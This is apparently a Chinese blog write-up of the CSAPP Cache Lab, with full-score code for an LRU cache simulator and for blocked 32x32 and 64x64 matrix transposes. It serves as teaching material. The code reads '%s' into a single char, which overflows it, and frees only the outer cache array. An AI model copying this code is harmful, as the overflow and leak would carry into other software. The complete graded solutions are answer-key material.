fscanf(trace_file, "%s %lx,%d\n", &operation, &address, &size) == 3; // 读取文件,返回值为成功读取的参数个数

FILE *:文件指针,指向文件的指针,用于读写文件。

fopen(const char *path, const char *mode):打开文件,返回文件指针。用 r 模式打开文件,表示只读。

fscanf(FILE *stream, const char *format, ...):从文件流中读取格式化输入。

  • %s 表示字符串
  • %lx 表示 16 进制数
  • %d 表示十进制数。返回值为成功读取的参数个数,所以这里指定为 3 个。

参数读取

#include <getopt.h> // getopt
#include <stdlib.h> // atoi

int main(int argc, char* argv[]) {
    int option;
    while ((option = getopt(argc, argv, "hvs:E:b:t:")) != -1) {
        switch (option) {
        case 'h':
            printUsage();
            exit(0);
        case 'v':
            v = 1;
            break;
        case 's':
            s = atoi(optarg); // 外部变量 optarg 指向当前选项参数的指针,atoi将字符串转换为整数
            break;
        case 'E':
            E = atoi(optarg);
            break;
        case 'b':
            b = atoi(optarg);
            break;
        case 't':
            trace_file = fopen(optarg, "r");
            break;
        default:
            printUsage();
            exit(0);
        }
    }
}

getopt(int argc, char * const argv[], const char *optstring):解析命令行参数。

  • argc 表示参数个数
  • argv 表示参数列表
  • optstring 表示选项字符串,选项字符串中的字母表示选项,冒号表示选项后面需要参数(必填)。返回值为当前选项字母,如果没有选项了则返回 -1。

在本例中,选项字符串为 hvs:E:b:t:,表示有 5 个选项,其中 sEbt 后面需要参数。hv 后面不需要参数。

关于 optarg,可以理解为是用来保存选项的参数的,而且虽然你没有定义它,但是因为你引入了 getopt.h 头文件,所以它是一个外部变量,你可以直接使用它。

本次测评不要求 hv 选项,所以你也可以用 s:E:b:t: 作为选项字符串(当然后面的逻辑也要对应修改)。

atoi(const char *nptr):将字符串转换为整数。

内存分配管理

CSAPP_3rd_P661_Figure_6.32

注:附图来自英文原版 CSAPP 3rd P661 Figure 6.32

struct line {
    int valid; // 有效位
    int tag; // 标记
    int last_used_time; // 最后使用时间
}; // 字节信息是没用的,不用存

// 定义组,每个组有 E 个行
typedef struct line* set;

// 定义缓存,有 S 个组
set* cache;

// 初始化缓存
cache = (set*)malloc(sizeof(set) * (1 << s));
for (int i = 0; i < (1 << s); i++) {
    cache[i] = (set)malloc(sizeof(struct line) * E);
    for (int j = 0; j < E; j++) {
        cache[i][j].valid = -1;
        cache[i][j].tag = -1;
        cache[i][j].last_used_time = -1;
    }
}

注意结构体使用 sizeof 时,要加上 struct 关键字。

cache 是一个 set 数组,每个 set 有 E 个 line,每个 line 有 3 个参数,分别是 valid、tag 和 last_used_time。

因而 cache 的类型是 set*,即指向 set 的指针,而 set 的类型是 line*,即指向 line 的指针。

malloccalloc 都是动态分配内存的函数,malloc 只分配内存,calloc 分配内存并初始化为 0。malloc 的参数为分配的字节数,calloc 的参数为分配的个数和每个元素的字节数。

别忘了最后释放内存:

free(cache);

踩坑

Modify 跳转技巧

Modify 修改操作 = Load 加载操作 + Store 存储操作,所以在 M 操作时,需要访问两次缓存。

你编写的程序不用支持 -v 参数,所以你可以使用如下的跳转表:

switch (operation) {
case 'I':
    continue;
case 'M': // Modify = Load + Store
    useCache(address);
case 'L': // Load
case 'S': // Store
    useCache(address);
}

这种写法可以让 M 操作直接多执行一次 useCache 函数,而不用再写一遍。但是,如果你想追求效率(尽管这个 Part 并不要求)或者想要支持 -v 参数,那么你可以直接多给 useCache 传递一个 is_modify 参数,来判断是否为 M 操作。若是,则可以直接令第二次写为 HIT,而不用再次访问缓存。具体实现可以参考我的代码。

值得一提的是,在所有的测试样例中,只有 mem.trace 中存在 M 操作,而 handout 中给出的测试命令行均没有测试它,也就没有测试 M 操作的正确性。你必须使用 test-csim 来测试 M 操作的正确性。

地址是 64 位,而不是 32 位

csim.c 中,地址是 64 位的,而不是 32 位的。所以你需要使用 %lx 来读取地址。同时你不能使用 int 类型来存储地址,而应该使用 unsigned long 或者 __uint64_t 类型或者 size_t 类型(执行的机器是 64 位的)。

另外注意对取地址时,一定要注意是否设置了对于高位(tag 位)的掩码,否则可能会出现段错误(数组越界了)。

int set_pos = address >> b & ((1 << s) - 1);

LRU(Least Recently Used)算法

初始化一个 line 的时候,也许将 last_used_time 初始化为 -1 会更好(区别于初始的 timestamp = 0)。因为这样可以判断这个 line 是否被使用过(即判断是否为冷不命中,决定是否要给 eviction 加一)。

在每次执行 useCache 的时候,让 timestamp 加一,即可维护一个时间戳(而不用使用什么标准库的时间戳,那样会导致两个问题,一个是可能精度不够(每次执行 useCache 的时间间隔可能太短),另一个是可能还要处理浮点数问题)。

同时,在遍历一个组的时候,你可以合并遍历和查找最小时间戳的操作,这样可以减少一次遍历。

其他

printSummary() 函数定义在 cachelab.h 中,所以你需要在 csim.c 中引入 cachelab.h 头文件。

putsprintf 函数都可以用来输出字符串,但是 puts 函数会自动在字符串后面加上换行符,而 printf 函数不会。

#include "cachelab.h"

printSummary(hit, miss, eviction);

如何理解地址的缓存

我的理解是,对于原本标记 “在内存中的地址(一串 64 位十六进制数)”,通过拆分出 Tag/Set/Byte 这三段,映射到了缓存中的唯一地方(类似于一个哈希函数,大范围到小范围,但是保证了一定的局部性)。当然,映射时就会出现类似冲突 / 驱逐(类似哈希冲突,本质是小范围映射会损失,无法真的不冲突地放下所有的大范围地址)的问题。

成品代码

// Arthals 2110306206@stu.pku.edu.cn
// File    : csim.c
// Time    : 2023-11-03 09:06:08
// Author  : Arthals
// Software: Visual Studio Code

#include <stdio.h>
#include <getopt.h>
#include <stdlib.h>
#include "cachelab.h"

struct line {
    int valid;
    int tag;
    int last_used_time;
};

// 定义组,每个组有 E 个行
typedef struct line* set;

// 定义缓存,有 S 个组
set* cache;

// 定义全局缓存参数
int v = 0, s, E, b, t, timestamp = 0;

// 定义全局返回参数
unsigned hit = 0, miss = 0, eviction = 0;

void printUsage() {
    puts("Usage: ./csim [-hv] -s <num> -E <num> -b <num> -t <file>");
    puts("Options:");
    puts("  -h         Print this help message.");
    puts("  -v         Optional verbose flag.");
    puts("  -s <num>   Number of set index bits.");
    puts("  -E <num>   Number of lines per set.");
    puts("  -b <num>   Number of block offset bits.");
    puts("  -t <file>  Trace file.");
    puts("");
    puts("Examples:");
    puts("  linux>  ./csim -s 4 -E 1 -b 4 -t traces/yi.trace");
    puts("  linux>  ./csim -v -s 8 -E 2 -b 4 -t traces/yi.trace");
}

void useCache(size_t address, int is_modify) {
    int set_pos = address >> b & ((1 << s) - 1);
    int tag = address >> (b + s);

    set cur_set = cache[set_pos];
    int lru_pos = 0, lru_time = cur_set[0].last_used_time;


    for (int i = 0;i < E;++i) {
        if (cur_set[i].tag == tag) {
            ++hit;
            // 如果是修改操作,那么还有一次写,会加一次命中(已被加载)
            hit += is_modify;
            cur_set[i].last_used_time = timestamp;
            if (v) {
                printf("hit\n");
            }
            return;
        }
        if (cur_set[i].last_used_time < lru_time) {
            lru_time = cur_set[i].last_used_time;
            lru_pos = i;
        }
    }
    ++miss;
    // 修改操作时,还有写的一次命中(已驱逐后加载)
    hit += is_modify;
    // 冷不命中
    eviction += (lru_time != -1);
    if (v) {
        if (lru_time != -1) {
            if (is_modify)
                printf("miss eviction hit\n");
            else
                printf("miss eviction\n");
        }
        else {
            printf("miss\n");
        }
    }
    // 驱逐
    cur_set[lru_pos].last_used_time = timestamp;
    cur_set[lru_pos].tag = tag;
    return;
}

int main(int argc, char* argv[]) {
    int option;
    FILE* trace_file;
    // 获取参数
    if (argc == 1) {
        printUsage();
        exit(0);
    }
    // 读取参数
    while ((option = getopt(argc, argv, "hvs:E:b:t:")) != -1) {
        switch (option) {
        case 'h':
            printUsage();
            exit(0);
        case 'v':
            v = 1;
            break;
        case 's':
            s = atoi(optarg); // 外部变量 optarg 指向当前选项参数的指针,stdlib::atoi将字符串转换为整数
            break;
        case 'E':
            E = atoi(optarg);
            break;
        case 'b':
            b = atoi(optarg);
            break;
        case 't':
            trace_file = fopen(optarg, "r");
            break;
        default:
            printUsage();
            exit(0);
        }
    }

    // 校验参数
    if (s <= 0 || E <= 0 || b <= 0 || s + b > 64 || trace_file == NULL) {
        printUsage();
        exit(1);
    }

    // 设置校验位数,发现没用到,遂注释
    // t = 64 - s - b;

    // 初始化缓存
    cache = (set*)malloc(sizeof(set) * (1 << s));
    for (int i = 0; i < (1 << s); i++) {
        cache[i] = (set)malloc(sizeof(struct line) * E);
        for (int j = 0; j < E; j++) {
            cache[i][j].valid = -1;
            cache[i][j].tag = -1;
            cache[i][j].last_used_time = -1;
        }
    }

    // S 38c08c, 1
    // L 30c080, 4
    // M 30c080, 4

    int size;
    char operation;
    size_t address;

    while (fscanf(trace_file, "%s %lx,%d\n", &operation, &address, &size) == 3) {
        ++timestamp;
        if (v) {
            printf("%c %lx,%d ", operation, address, size);
        }
        switch (operation) {
        case 'I':
            continue;
        case 'M': // Modify = Load + Store
            useCache(address, 1);
            break;
        case 'L': // Load
        case 'S': // Store
            useCache(address, 0);
        }
    }

    free(cache);
    printSummary(hit, miss, eviction);
}

运行:

make && ./test-csim

得到:

                        Your simulator     Reference simulator
Points (s,E,b)    Hits  Misses  Evicts    Hits  Misses  Evicts
     3 (1,1,1)       9       8       6       9       8       6  traces/yi2.trace
     3 (4,2,4)       4       5       2       4       5       2  traces/yi.trace
     3 (2,1,4)       2       3       1       2       3       1  traces/dave.trace
     3 (2,1,3)     694     453     449     694     453     449  traces/mem.trace
     3 (2,2,3)     201      37      29     201      37      29  traces/trans.trace
     3 (2,4,3)     212      26      10     212      26      10  traces/trans.trace
     3 (5,1,5)     231       7       0     231       7       0  traces/trans.trace
     6 (5,1,5)  265189   21777   21745  265189   21777   21745  traces/long.trace
    27

TEST_CSIM_RESULTS=27

大功告成!

PartB

缓存参数:s = 5, E = 1, b = 5

所以这是一个有 32 个组($S = 2^s = 32$)的直接映射高速缓存($E = 1$),每个组只有 1 个块,每个块有 32 个字节($B = 2^b = 32$)。

也就是说,一共可以放得下 1024 个字节,即 256 个 int。

32x32

测试指令:

make && ./test-trans -M 32 -N 32

满分线:misses <= 300。

观察到示例转置函数的结果:hits:869, misses:1184, evictions:1152

显然这是极差的,因为 A 和 B 的大小一致,而且存储的地址偏差正好使得其对应位置的数据都在同一个组(行 / 块)中(初始地址映射的块相同)。

以下讨论何时会出现冲突。考虑默认程序,我们总是需要将 A[i][j] 读出后写到 B[j][i]

因而,我们需要考虑他们各自在上级缓存中的位置。你可以认为行优先读时,每 8 个连续的 int 总是映射到同一个 Set/Block(即 A[i][8k+0] ~ A[i][8k+7])。对 B 同理。

所以,我们发现,直接按元素写的时候,会出现大量的不命中。但是实际是不命中只有 1184 次,如果每个读写都造成两次不命中显然不止这么点,那么什么时候会命中?

考虑读 A[i][j] 时,我们总要写 B[j][i]。因而存储着两个数据的块的起始偏移量地址(按照 int 数计算)分别为:

  • A[i][j]:i × 32 + j
  • B[j][i]:j × 32 + i

由于每 8 个 int 偏移一个缓存 Set,所以在缓存中,两个块分别存储如下:

  • A[i][j]:存储在第 ⌊(i × 4 + ⌊j/8⌋)/32⌋ 个块,存储着 A[i][ ⌊j/8⌋ ] ~ A[i][ ⌊j/8⌋+7 ]
  • B[j][i]:存储在第 ⌊(j × 4 + ⌊i/8⌋)/32⌋ 个块,存储着 B[j][ ⌊i/8⌋ ] ~ B[j][ ⌊i/8⌋+7 ]

所以,当 i = j 时,两个块的 Set 会发生冲突,导致大量的不命中。而当 i != j 时,两个块的 Set 不会发生冲突。

  • 对于读 A 操作来说,我们往往具有很好的局部性,因为是行优先读,所以每 8 个数,除了第一次加载,后面的 7 次都会命中。
  • 对于写 B 操作来说,我们完全没有利用局部性。考虑我们写 B 的第 j 行,我们第一次写(B[j][0])和第二次写(B[j][1])之间至少包括了对 B 的一整列(列优先,31 行,B[j+1][0] ~ B[j-1][1])的全部写,而我们的缓存大小只有 256 个数的大小(即 8 行),当前行早就被刷掉了,所以我们写 B 完全没机会出现命中。而且在对角线处时,我们还会因为要写 B 而导致对于已经读入的 A 的行发生冲突不命中(即要发生一次驱逐)。

cache32x32

所以整体计算下来,应当发生 1024(写 B 全部不命中)+ 4(写 A 每行每 8 个数不命中一次)* 32(写 A 的行)+ 32(对角线处写 B 造成读 A 驱逐,需要重新读一次),即 1184 次不命中。

此处写这么细,是因为后续处理别的尺寸的时候也可以进行类似的推导。

调用 csim-ref 来查看 trace:

./csim-ref -v -s 5 -E 1 -b 5 -t trace.f1 > trace.f1.v

果不其然,有大量的 miss:

L 10e0c0,4 miss
S 14e4a0,4 miss eviction
L 10e0c4,4 hit
S 14e520,4 miss eviction
L 10e0c8,4 hit
S 14e5a0,4 miss eviction
L 10e0cc,4 hit
S 14e620,4 miss eviction
L 10e0d0,4 hit
S 14e6a0,4 miss eviction
L 10e0d4,4 hit
S 14e720,4 miss eviction
L 10e0d8,4 hit
S 14e7a0,4 miss eviction
L 10e0dc,4 hit
S 14e820,4 miss eviction
L 10e0e0,4 miss eviction
S 14e8a0,4 miss eviction

于是,我们很自然的想到,通过限制写 B 的范围,来利用 B 的局部性。而这也就是书上讲过的分块技巧:将 32x32 的矩阵分成 8x8 的小块,这样就可以充分利用局部性,读 A 一次连续读入 8 个元素,然后转置,再连续写入 B。即避免了对于写 B 时,因为列优先顺序写造成的缓存驱逐。

同时我们使用多个局部变量来存储从 A 读出来的数据,这样可以最大化地利用局部性。

void transpose_submit(int M, int N, int A[N][M], int B[M][N]) {
    REQUIRES(M > 0);
    REQUIRES(N > 0);
    // s = 5, E = 1, b = 5
    // 总变量:4 个循环变量 + 8 个临时变量 = 12 个变量
    int a, b, c, d, e, f, g, h;

    if (M == 32) {
        // 先把 A 复制 B,再转置 B,避免因为 A 的下一次读驱逐 B 的同一行,导致 B 的下一次写 MISS
        // 8*8 分块
        // 总 MISS:16(块数)*[8(读)+8(写)] = 256
        // 显示 MISS =  260,但是通过添加 trans() 的代码并清空缓存,然后对比测试差异,可知实际只有 256 个 MISS
        // 故猜测那 4 个多的 MISS 可能是别的函数调用所致,也可通过观察 trace.f0 发现确实开头多了 1 个 S 和 3 个 L
        for (int i = 0; i < N; i += 8) { // 当前行
            for (int j = 0; j < M; j += 8) { // 当前列
                // 首先将 A[i][j]~A[i+7][j+7] 复制到 B[j][i]~B[j+7][i+7]
                for (int k = 0;k < 8;++k) {
                    a = A[i + k][j];
                    b = A[i + k][j + 1];
                    c = A[i + k][j + 2];
                    d = A[i + k][j + 3];
                    e = A[i + k][j + 4];
                    f = A[i + k][j + 5];
                    g = A[i + k][j + 6];
                    h = A[i + k][j + 7];
                    B[j][i + k] = a;
                    B[j + 1][i + k] = b;
                    B[j + 2][i + k] = c;
                    B[j + 3][i + k] = d;
                    B[j + 4][i + k] = e;
                    B[j + 5][i + k] = f;
                    B[j + 6][i + k] = g;
                    B[j + 7][i + k] = h;
                }
            }
        }
    }
    ENSURES(is_transpose(M, N, A, B));
}

运行:

make && ./test-trans -M 32 -N 32

得到:

func 0 (Transpose submission): hits:1765, misses:288, evictions:256

可以发现我们已经将 miss 降低到了 288,小于 300 的满分限,收获满分!

但是,这就是完美无缺的吗?显然不是,我们可以继续优化。

注意到理论最优 MISS 数应当是 16(块数) * [8(读A)+8(写B)] = 256 次,为什么会多出来 32 次呢?

这是因为当 i=j 时,A[i][i]B[i][i] 的组数是一样的,所以每次处理对角线上的块时,都会额外出现 8 次 MISS:

  1. 写 B 的第 i 列,导致 A 的第 i+1 行被驱逐
  2. 读 A 的第 i+1 行,导致 B 的第 i+1 行被驱逐
  3. 写 B 的第 i+1 列,冲突不命中
  4. ...

diag

有没有什么优化方法呢?当然是有的,我们可以先将 A 的一个块完整、不转置地复制到 B,然后再转置 B,这样对 B 的转置与写时,因为 B 已经完全加载到了缓存中,所以不会出现任何的不命中。

void transpose_submit(int M, int N, int A[N][M], int B[M][N]) {
    REQUIRES(M > 0);
    REQUIRES(N > 0);
    // s = 5, E = 1, b = 5
    // 总变量:4 个循环变量 + 8 个临时变量 = 12 个变量
    int a, b, c, d, e, f, g, h;

    if (M == 32) {
        // 先把 A 复制 B,再转置 B,避免因为 A 的下一次读驱逐 B 的同一行,导致 B 的下一次写 MISS
        // 8*8 分块
        // 总 MISS:16(块数)*[8(读)+8(写)] = 256
        // 显示 MISS =  260,但是通过添加 trans() 的代码并清空缓存,然后对比测试差异,可知实际只有 256 个 MISS
        // 故猜测那 4 个多的 MISS 可能是别的函数调用所致,也可通过观察 trace.f0 发现确实开头多了 1 个 S 和 3 个 L
        for (int i = 0; i < N; i += 8) { // 当前行
            for (int j = 0; j < M; j += 8) { // 当前列
                // 首先将 A[i][j]~A[i+7][j+7] 复制到 B[j][i]~B[j+7][i+7]
                for (int k = 0;k < 8;++k) {
                    a = A[i + k][j];
                    b = A[i + k][j + 1];
                    c = A[i + k][j + 2];
                    d = A[i + k][j + 3];
                    e = A[i + k][j + 4];
                    f = A[i + k][j + 5];
                    g = A[i + k][j + 6];
                    h = A[i + k][j + 7];
                    B[j + k][i] = a;
                    B[j + k][i + 1] = b;
                    B[j + k][i + 2] = c;
                    B[j + k][i + 3] = d;
                    B[j + k][i + 4] = e;
                    B[j + k][i + 5] = f;
                    B[j + k][i + 6] = g;
                    B[j + k][i + 7] = h;
                }
                // 转置 B
                for (int k = 0;k < 8;++k) {
                    // 对角线不用交换
                    for (int l = 0;l < k;++l) {
                        a = B[j + k][i + l];
                        B[j + k][i + l] = B[j + l][i + k];
                        B[j + l][i + k] = a;
                    }
                }
            }
        }
    }
    ENSURES(is_transpose(M, N, A, B));
}

运行:

make && ./test-trans -M 32 -N 32

得到:

Summary for official submission (func 0): correctness=1 misses=260

可以发现我们已经将 miss 降低到了 260,非常接近理论值 256 了,而经过测试,这 4 个多出来的 MISS 其实函数调用所致。

64x64

测试指令:

make && ./test-trans -M 64 -N 64

满分线:misses <= 1300。

首先,我们直接使用 32x32 中的代码:

if (M == 32 || M==64){...}

得到输出:

Summary for official submission (func 0): correctness=1 misses=3332

发现 miss 过多,这是为什么呢?

回忆一下我们的 cache 参数:s = 5, E = 1, b = 5,即 block 有 32 个字节(存 8 个 int) ,32 个组,每个组只有 1 个行。所以我们的缓存总容量是 256 个 int,而 64x64 的矩阵 4 行即可占用 256 个 int,所以我们 8x8 分块后,上半块和下半块的数据会发生冲突不命中,换句话说,就是读 A[i][0]A[i+4][0] 时会造成冲突不命中,写 B 同理。

如果直接修改代码改成 4x4 分块,我们的确就可以解决这个问题:

if (M == 64) {
    for (int i = 0; i < N; i += 4) { // 当前行
        for (int j = 0; j < M; j += 4) { // 当前列
            // 首先将 A[i][j]~A[i+3][j+3] 复制到 B[j][i]~B[j+3][i+3]

            for (int k = 0;k < 4;++k) {
                a = A[i + k][j];
                b = A[i + k][j + 1];
                c = A[i + k][j + 2];
                d = A[i + k][j + 3];
                B[j + k][i] = a;
                B[j + k][i + 1] = b;
                B[j + k][i + 2] = c;
                B[j + k][i + 3] = d;
            }
            // 转置 B
            for (int k = 0;k < 4;++k) {
                // 对角线不用交换
                for (int l = 0;l < k;++l) {
                    a = B[j + k][i + l];
                    B[j + k][i + l] = B[j + l][i + k];
                    B[j + l][i + k] = a;
                }
            }
        }
    }
}

运行:

make && ./test-trans -M 64 -N 64

得到:

Summary for official submission (func 0): correctness=1 misses=1604

收获了 4.5 分,但是仍然不够理想。

注意这里不能采用 4x8 分块,因为这样虽然可以避免 A 矩阵的读的冲突不命中,但是 B 矩阵的写的冲突不命中仍然存在。

不过这也启发了我们,既然可以通过 4x8 分块首先避免对于 A 矩阵的读的冲突不命中,那么 B 矩阵的写的冲突不命中是不是可以通过 “暂时性” 地将后 4 个元素先放到同一行的块里来避免呢?

cache64x64

于是我们得到了优化思路:既然直接 8x8 分块不行,那我们就先 8x8 分大块,再在每个大块内 4x4 地分小块,然后注意,读完 A 的第一行(8 个 int)后,我们将前 4 个正常转置并写入 B,然后将后 4 个先放到一个暂时存储块中,这样就可以避免写下半块时的冲突不命中了。

考虑 α[2][2]β[2][2] 为 A、B 8x8 分块之后的矩阵再进行 4x4 分块得到的子矩阵,其每个元素都是 4x4 个 int 。

以下所有代码说明,建议参照 NFLS-CHINA / CSAPP - Cache Lab 的更(最)优秀的解法 一文的图片对照着看,我相信你会有更好的理解。

for (int i = 0; i < N; i += 8) { // 当前行
    for (int j = 0; j < M; j += 8) { // 当前列
        // 先复制
        for (int k = 0;k < 4;++k) {
            // 从 A 中取 α[0][0]+α[0][1]的第 k 行,执行 4 次,即读出 A 的上半块,每次循环,读 A 都必然 MISS
            // 所以总计 4 次 MISS。
            a = A[i + k][j];
            b = A[i + k][j + 1];
            c = A[i + k][j + 2];
            d = A[i + k][j + 3];
            e = A[i + k][j + 4];
            f = A[i + k][j + 5];
            g = A[i + k][j + 6];
            h = A[i + k][j + 7];
            // 转置前四个数到 β[0][0] 的第 k 列,4 次 MISS
            // 若 i=j 还会因为上一步读 A 造成冲突不命中,所以额外造成 3 次冲突不命中。
            B[j][i + k] = a;
            B[j + 1][i + k] = b;
            B[j + 2][i + k] = c;
            B[j + 3][i + k] = d;
            // 将后四个转置后,先复制到 β[0][1] 的第 k 列
            // 可以避免此时去写 β[1][0] 的冲突不命中
            B[j][i + k + 4] = e;
            B[j + 1][i + k + 4] = f;
            B[j + 2][i + k + 4] = g;
            B[j + 3][i + k + 4] = h;
        }
    }
}
  • 对于 i ≠ j:4 + 4 = 8 次 MISS
  • 对于 i = j: 4 + 4 + 3 = 11 次 MISS

此时,已经转置完毕 β[0][0](左上矩阵),而转置好的 β[1][0](左下矩阵)暂时位于 β[0][1](右上矩阵)。

同时,A 的前四行已经完全被读完并用完了。所以我们可以放心的开始读 A 的后四行了。

// 此时,已经转置完毕 β[0][0]
// 转置好的 β[1][0] 位于 β[0][1]

// 移动 β[0][1] 到 β[1][0]
// 同时将 α[1][0] 复制并转置到 β[0][1]

for (int k = 0;k < 4;++k) {
    // 读 α[1][0] 的第 k 列,首次循环造成 4 次 MISS,后续循环均 HIT
    // 对于 i=j 时,因为循环间读 B (见下一步,位于上半块)会造成 1 次冲突不命中,原有的一行缓存被驱逐
    // 所以总计造成 4 / 7 次 MISS
    e = A[i + 4][j + k];
    f = A[i + 5][j + k];
    g = A[i + 6][j + k];
    h = A[i + 7][j + k];
    // 复制 β[0][1] 的第 k 行,一定是行优先读,否则写的时候会出现额外的冲突不命中
    // 若 i ≠ j 时因为上一部分最后写了这里,所以全部命中
    // 若 i=j,每次循环都会因为上一步读 A 造成了冲突不命中,所以每次循环 1 次 MISS,总计 4 次 MISS
    // 所以总计造成 0 / 4 次 MISS
    a = B[j + k][i + 4];
    b = B[j + k][i + 5];
    c = B[j + k][i + 6];
    d = B[j + k][i + 7];
    // 将 α[1][0] 的第 k 列复制到 β[0][1] 的第 k 行,因为上一步读的时候已经完成缓存,所以写的时候不会 MISS
    B[j + k][i + 4] = e;
    B[j + k][i + 5] = f;
    B[j + k][i + 6] = g;
    B[j + k][i + 7] = h;
    // 将 β[0][1] 的第 k 行复制到 β[1][0] 的第 k 行
    // 注意你这里是按行读写的,所以对于所有情况,每次循环造成 1 次冲突不命中(上一步读上半块了,一定没缓存了)
    // 所以总计造成 4 次 MISS
    B[j + k + 4][i] = a;
    B[j + k + 4][i + 1] = b;
    B[j + k + 4][i + 2] = c;
    B[j + k + 4][i + 3] = d;
}

这里我们已经将 β[1][0](左下矩阵)交换回正确的位置,以及转置了 β[0][1](右上矩阵)。

  • 对于 i ≠ j:4 + 4 = 8 次 MISS
  • 对于 i = j: 7 + 4 + 4 = 15 次 MISS

注意我们先读 A 再读 B,这里也可以先读 B 再读 A ,两者没有区别。我原以为,读 β[0][1](右上矩阵)(实际上存的是 β[1][0](左下矩阵)) 接写 β[0][1](右上矩阵)可以避免 MISS,但实际测试无影响。读者可以思考一下是为什么。

β[1][1](右下矩阵)仍然没做操作,我们使用类似 32x32 中的先复制再转置的方法,将 β[1][1](右下矩阵)转置好。

// 复制 α[1][1] 到 β[1][1]
// 依旧是先复制再转置以避免冲突不命中
// 若 i≠j,完全没有 MISS,因为 A、B 均在上个部分被读入缓存
// 若 i=j,因为上一部分最后是写 B 的最后一行,但是其他行都是正常的,所以读 A 时会出现 1 次冲突不命中,
// 读完 A 写 B 时,必定出现冲突不命中,每次循环 1 次 MISS
// 所以总计造成 0 / 5 次 MISS
for (int k = 4;k < 8;++k) {
    a = A[i + k][j + 4];
    b = A[i + k][j + 5];
    c = A[i + k][j + 6];
    d = A[i + k][j + 7];
    B[j + k][i + 4] = a;
    B[j + k][i + 5] = b;
    B[j + k][i + 6] = c;
    B[j + k][i + 7] = d;
}
// 转置 β[1][1]
// 全部 HIT
for (int k = 4;k < 8;++k) {
    // 对角线不用交换
    for (int l = 4;l < k;++l) {
        a = B[j + k][i + l];
        B[j + k][i + l] = B[j + l][i + k];
        B[j + l][i + k] = a;
    }
}
  • 对于 i ≠ j:0 次 MISS
  • 对于 i = j:5 次 MISS

最终,我们得到了满分的代码:

if (M == 64) {
    // 因为每个 8*8 分块中,上半块和下半块会冲突不命中,所以再把每个 8*8 分块分成 4 个 4*4 分块
    // 然后通过暂时性存储 β[1][0](左下块) 到 β[0][1](右上块) 来避免冲突不命中
    // 若直接写到 β[1][0](左下块),则会写 B 的上半块(4*8) 和下半块(4*8) 时出现冲突不命中
    // 特别的,对于 i=j 的情况,还是会出现冲突不命中,因为 A 本身和 B 就是冲突的
    // 计算出的总 MISS 数为 (8+8)*56+(11+15+5)*8 = 1144 次,但是实际是 1148 次,应该又是程序调用的问题
    for (int i = 0; i < N; i += 8) { // 当前行
        for (int j = 0; j < M; j += 8) { // 当前列
            // 先复制
            for (int k = 0;k < 4;++k) {
                // 从 A 中取 α[0][0]+α[0][1]的第 k 行,执行 4 次,即读出 A 的上半块,每次循环,读 A 都必然 MISS
                // 所以总计 4 次 MISS。
                a = A[i + k][j];
                b = A[i + k][j + 1];
                c = A[i + k][j + 2];
                d = A[i + k][j + 3];
                e = A[i + k][j + 4];
                f = A[i + k][j + 5];
                g = A[i + k][j + 6];
                h = A[i + k][j + 7];
                // 转置前四个数到 β[0][0] 的第 k 列,4 次 MISS
                // 若 i=j 还会因为上一步读 A 造成冲突不命中,所以额外造成 3 次冲突不命中。
                B[j][i + k] = a;
                B[j + 1][i + k] = b;
                B[j + 2][i + k] = c;
                B[j + 3][i + k] = d;
                // 将后四个转置后,先复制到 β[0][1] 的第 k 列
                // 可以避免此时去写 β[1][0] 的冲突不命中
                B[j][i + k + 4] = e;
                B[j + 1][i + k + 4] = f;
                B[j + 2][i + k + 4] = g;
                B[j + 3][i + k + 4] = h;
            }
            // 此时,已经转置完毕 β[0][0]
            // 转置好的 β[1][0] 位于 β[0][1]
            // * 对于 i ≠ j:4 + 4 = 8 次 MISS
            // * 对于 i = j: 4 + 4 + 3 = 11 次 MISS

            // ------- //

            // 移动 β[0][1] 到 β[1][0]
            // 同时将 α[1][0] 复制并转置到 β[0][1]

            for (int k = 0;k < 4;++k) {
                // 读 α[1][0] 的第 k 列,首次循环造成 4 次 MISS,后续循环均 HIT
                // 对于 i=j 时,因为循环间读 B (见下一步,位于上半块)会造成 1 次冲突不命中,原有的一行缓存被驱逐
                // 所以总计造成 4 / 7 次 MISS
                e = A[i + 4][j + k];
                f = A[i + 5][j + k];
                g = A[i + 6][j + k];
                h = A[i + 7][j + k];
                // 复制 β[0][1] 的第 k 行,一定是行优先读,否则写的时候会出现额外的冲突不命中
                // 若 i ≠ j 时因为上一部分最后写了这里,所以全部命中
                // 若 i=j,每次循环都会因为上一步读 A 造成了冲突不命中,所以每次循环 1 次 MISS,总计 4 次 MISS
                // 所以总计造成 0 / 4 次 MISS
                a = B[j + k][i + 4];
                b = B[j + k][i + 5];
                c = B[j + k][i + 6];
                d = B[j + k][i + 7];
                // 将 α[1][0] 的第 k 列复制到 β[0][1] 的第 k 行,因为上一步读的时候已经完成缓存,所以写的时候不会 MISS
                B[j + k][i + 4] = e;
                B[j + k][i + 5] = f;
                B[j + k][i + 6] = g;
                B[j + k][i + 7] = h;
                // 将 β[0][1] 的第 k 行复制到 β[1][0] 的第 k 行
                // 注意你这里是按行读写的,所以对于所有情况,每次循环造成 1 次冲突不命中(上一步读上半块了,一定没缓存了)
                // 所以总计造成 4 次 MISS
                B[j + k + 4][i] = a;
                B[j + k + 4][i + 1] = b;
                B[j + k + 4][i + 2] = c;
                B[j + k + 4][i + 3] = d;
            }
            // 这里我们已经将 β[1][0](左下矩阵)交换回正确的位置,以及转置了 β[0][1](右上矩阵)。
            // * 对于 i ≠ j:4 + 4 = 8 次 MISS
            // * 对于 i = j: 7 + 4 + 4 = 15 次 MISS

            // ------- //

            // 复制 α[1][1] 到 β[1][1]
            // 依旧是先复制再转置以避免冲突不命中
            // 若 i≠j,完全没有 MISS,因为 A、B 均在上个部分被读入缓存
            // 若 i=j,因为上一部分最后是写 B 的最后一行,但是其他行都是正常的,所以读 A 时会出现 1 次冲突不命中,
            // 读完 A 写 B 时,必定出现冲突不命中,每次循环 1 次 MISS
            // 所以总计造成 0 / 5 次 MISS
            for (int k = 4;k < 8;++k) {
                a = A[i + k][j + 4];
                b = A[i + k][j + 5];
                c = A[i + k][j + 6];
                d = A[i + k][j + 7];
                B[j + k][i + 4] = a;
                B[j + k][i + 5] = b;
                B[j + k][i + 6] = c;
                B[j + k][i + 7] = d;
            }
            // 转置 β[1][1]
            // 全部 HIT
            for (int k = 4;k < 8;++k) {
                // 对角线不用交换
                for (int l = 4;l < k;++l) {
                    a = B[j + k][i + l];
                    B[j + k][i + l] = B[j + l][i + k];
                    B[j + l][i + k] = a;
                }
            }
            // * 对于 i ≠ j:0 次 MISS
            // * 对于 i = j:5 次 MISS
        }
    }
}

运行:

make && ./test-trans -M 64 -N 64

得到:

Summary for official submission (func 0): correctness=1 misses=1148

